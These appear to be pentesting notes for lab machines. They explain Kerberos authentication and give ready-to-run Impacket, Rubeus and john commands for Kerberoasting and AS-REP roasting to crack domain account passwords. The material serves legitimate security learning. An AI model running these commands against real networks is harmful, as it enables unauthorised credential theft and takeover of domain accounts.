When a user logs onto their workstation, their machine will send an AS-REQ message to the Key Distribution Center (KDC), aka Domain Controller, requesting a TGT using a secret key derived from the user’s password.
The KDC verifies the secret key with the password it has stored in Active Directory for that user. Once validated, it returns the TGT in an AS-REP message.The TGT contains the user’s identity and is encrypted with the KDC secret key (the krbtgt account).
When the user attempts to access a resource backed by Kerberos authentication (e.g. a file share), their machine looks up the associated Service Principal Name (SPN). It then requests (TGS-REQ) a Ticket Granting Service Ticket (TGS) for that service from the KDC, and presents its TGT as a means of proving they're a valid user.
The KDC returns a TGS (TGS-REP) for the service in question to the user, which is then presented to the actual service. The service inspects the TGS and decides whether it should grant the user access or not.
Kerberoasting is a technique for requesting TGS’s for services running under the context of domain accounts and cracking them offline to reveal their plaintext passwords.
Using Impacket
Attack carried out from attacker machine.
GetUserSPNs.py -request -dc-ip 10.129.x.x active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Using Rubeus.exe
Attack carried out form target machine (upload the binary to target machine).
.\Rubeus.exe kerberoast /simple /nowrap
For specific user.
.\Rubeus.exe kerberoast /user:svc_mssql /nowrap
Get the hash and try to crack it offline with john.
john --format=krb5tgs --wordlist=wordlist hash.txt
If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password.
Using Impacket
GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip 10.129.1.165
For multiple Users.
for user in $(cat users.txt); do GetNPUsers.py -no-pass -dc-ip 10.129.168.220 EGOTISTICAL-BANK.LOCAL/${user} | grep -v Impacket; done
Using Rubeus.exe
.\Rubeus.exe asreproast /user:fsmith /nowrap
Hash cracking.
john --format=krb5asrep --wordlist=wordlist hash.txt